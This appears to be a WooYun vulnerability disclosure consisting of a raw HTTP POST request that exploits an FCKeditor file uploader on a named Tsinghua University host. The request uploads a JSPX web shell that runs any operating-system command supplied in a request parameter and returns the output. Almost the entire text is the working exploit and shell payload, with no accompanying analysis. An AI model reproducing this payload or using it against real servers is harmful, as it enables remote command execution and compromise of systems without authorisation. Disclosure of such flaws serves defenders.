WooYun.org

POST //JournalX_gclx//secure/admin/fckeditor/editor/filemanager/upload/simpleuploader?Type=File HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Content-Type: multipart/form-data; boundary=---------------------------7de1b519306dc
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: gclx.tsinghua.edu.cn
Expect: 100-continue
Content-Length: 1311
-----------------------------7de1b519306dc
Content-Disposition: form-data; name="NewFile"; filename="success.jspx"
application/octet-stream
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"
xmlns="http://www.w3.org/1999/xhtml"
xmlns:c="http://java.sun.com/jsp/jstl/core" version="1.2">
<jsp:directive.page contentType="text/html" pageEncoding="gb2312"/>
<jsp:directive.page import="java.io.*"/>
<html>
<head>
<title>jspx</title>
</head>
<body>
<jsp:scriptlet>
try {
String cmd = request.getParameter("paxmac");
if (cmd !=null){
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
}
} catch (IOException e) {
System.err.println(e);
}
</jsp:scriptlet>
</body>
</html>
</jsp:root>
-----------------------------7de1b519306dc
Content-Disposition: form-data; name="id"
-----------------------------7de1b519306dc
Content-Disposition: form-data; name="proxyurl"
-----------------------------7de1b519306dc--